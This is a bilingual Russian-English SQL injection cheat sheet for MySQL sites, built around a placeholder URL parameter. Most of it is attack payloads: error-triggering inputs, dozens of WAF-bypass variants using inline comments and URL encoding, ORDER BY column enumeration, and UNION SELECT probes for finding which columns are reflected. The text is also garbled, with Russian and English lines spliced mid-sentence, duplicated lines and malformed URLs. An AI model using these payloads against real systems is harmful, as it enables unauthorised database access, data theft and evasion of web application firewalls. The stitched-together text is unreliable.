
Шпаргалка, содержащая продвинутые запросы для SQL-инъекций всех типов.
Это, вероятно, самая простая уязвимость среди атак типа SQL Injection. Атакующий может перечислить и выгрузить базу данных MySQL, используя сообщения об ошибках SQL в своих интересах.
http://domain.com/index.php?id=1Website loads successfully
http://domain.com/index.php?id=1'
Появляется сообщение об ошибке: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...``````http://domain.com/index.php?id=1\'
Error message shows up: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near...
http://domain.com/index.php?id=1 and 0' order by 1--+
Веб-сайт успешно загружаетсяhttp://domain.com/index.php?id=2-1
Website loads successfully
http://domain.com/index.php?id=-1'
Сообщение об ошибке снова появляетсяhttp://domain.com/index.php?id=-1)'
Error message shows up again
http://domain.com/index.php?id=1'-- -
Веб-сайт может загрузиться успешно, но также может показывать ошибку.http://domain.com/index.php?id=1'--
Website might loads successfuly, but it might shows error also
http://domain.com/index.php?id=1+--+
Сайт может загружаться успешно, но также может показывать ошибку
В некоторых случаях WAF не позволяет вызывать ошибки на сайте, поэтому для обхода WAF может потребоваться отправка специальных запросов.http://domain.com/index.php?id=1'--/**/-
If no WAF Warning is shown and website loads up, we confirm the vulnerability, else try the following payloads.
http//domain.com/index.php?id=/^.*1'--+-.*$/
http//domain.com/index.php?id=/*!500001'--+-*/
http//domain.com/index.php?id=1'--/**/-
http//domain.com/index.php?id=1'--/*--*/-
http//domain.com/index.php?id=1'--/*&a=*/-
http//domain.com/index.php?id=1'--/*1337*/-
http//domain.com/index.php?id=1'--/**_**/-
http//domain.com/index.php?id=1'--%0A-
http//domain.com/index.php?id=1'--%0b-
http//domain.com/index.php?id=1'--%0d%0A-
http//domain.com/index.php?id=1'--%23%0A-
http//domain.com/index.php?id=1'--%23foo%0D%0A-
http//domain.com/index.php?id=1'--%23foo*%2F*bar%0D%0A-
http//domain.com/index.php?id=1'--#qa%0A#%0A-
http//domain.com/index.php?id=/*!20000%0d%0a1'--+-*/
http//domain.com/index.php?id=/*!blobblobblob%0d%0a1'--+-*/
Now that we performed an SQL syntax error to the website, we can begin fuzzing and finding how many columns do we have by using ORDER BY
http://domain.com/index.php?id=1' order by 1-- -
Этот запрос не должен выдавать ошибку, так как числа меньше 1 не существует
Если payload выдаёт ошибку, попробуйте задать отрицательное значение:http://domain.com/index.php?id=-1' order by 1-- -
This query musn't shows up error, since there is no lower number than 1
If the payload shows up error, try removing the quote which might cause SQL error:
http://domain.com/index.php?id=605 order by 1-- -
http://domain.com/index.php?id=-605 order by 1-- -
These both queries musn't shows up error. If error is still ocurring, try the following payloads:
http://domain.com/index.php?id=1' order by 1 desc-- -
http://domain.com/index.php?id=1' group by 1-- -
http://domain.com/index.php?id=1' group by 1-- -
http://domain.com/index.php?id=1' /**/ORDER/**/BY/**/ 1-- -
http://domain.com/index.php?id=-1' /*!order*/+/*!by*/ 1-- -
http://domain.com/index.php?id=1' /*!ORDER BY*/ 1-- -
http://domain.com/index.php?id=1'/*!50000ORDER*//**//*!50000BY*/ 1-- -
http://domain.com/index.php?id=1' /*!12345ORDER*/+/*!BY*/ 1-- -
http://domain.com/index.php?id=1' /*!50000ORDER BY*/ 1-- -
http://domain.com/index.php?id=1' order/**_**/by 1-- -
http://domain.com/index.php?id=1\ order by 1-- -
http://domain.com/index.php?id=1' order by 1 asc-- -
http://domain.com/index.php?id=1' group by 1 asc-- -
http://domain.com/index.php?id=1' AND 0 order by 1-- -
http://domain.com/index.php?id=1%0Aorder%0Aby%0A1-- -
http://domain.com/index.php?id=1%23%0Aorder%23%0Aby%23%0A1-- -
http://domain.com/index.php?id=1%23aa%0Aorder%23aa%0Aby%23aa%0A1-- -
http://domain.com/index.php?id=1%23xyz%0Aorder%23xyz%0Aby%23xyz%0A1-- -
http://domain.com/index.php?id=1%23foo%0D%0Aorder%23foo%0D%0Aby%23foo%0D%0A1-- -
http://domain.com/index.php?id=1%23foo*%2F*bar%0D%0Aorder%23foo*%2F*bar%0D%0Aby%23foo*%2F*bar%0D%0A1-- -
http://domain.com/index.php?id=1/*!20000%0d%0a+order+by+*/1-- -
http://domain.com/index.php?id=1/*!blobblobblob%0d%0a+order+by+*/1-- -
http://domain.com/index.php?id=1/*!f****U%0d%0a+order+by+*/1-- -```
- If none of the payloads didn't bypass WAF, try again the payloads by following the 2 rules below:
- Add a minus (-) before 1 (example: ```?id=-1' /**/ORDER/**/BY/**/ 1-- -```)
- Remove the quote (') after the parameter value (example: ```?id=1 /**/ORDER/**/BY/**/ 1-- -```)
In this case, the payload ```?id=1 order by 1-- -``` worked and website loads successfuly. Now it is time to find the correct number of columns. Now let's use the payload that worked, and try increasing the number by 1, untill an error shows up:
```http://domain.com/index.php?id=1 order by 1-- -``` no error
```http://domain.com/index.php?id=1 order by 2-- -``` no error
```http://domain.com/index.php?id=1 order by 3-- -``` no error
```http://domain.com/index.php?id=1 order by 4-- -``` no error
```http://domain.com/index.php?id=1 order by 5-- -``` error:
```Unknown column '5' in 'order clause'Unknown column '5' in 'order clause'```
This means there are only 4 columns. Now we have to find which one of these 4 columns have information.
## Find the vulnerable column where information are stored using 'UNION SELECT' query
Using a simple query, we determine which of the 4 columns reflect our input using. Only 1 of these payloads will run without **syntax error**. *NOTE: If none worked, try the same payloads, but remove the quote (') after number 1.*
```http://domain.com/index.php?id=1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1 Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=1'+UNION+ALL+SELECT+null,null,null,null--+-```
```http://domain.com/index.php?id=1' Union Select null,2,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,null,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,null,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,3,null-- -```
```http://domain.com/index.php?id=.1' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=-1' div 0' Union Select 1,2,3,4-- -```
```http://domain.com/index.php?id=1' Union Select 1,2,3,4 desc-- -```
```http://domain.com/index.php?id=1' AND 0 Union Select 1,2,3,4-- -```
Website must successfully load and we will see a number (in our case between 1-4)
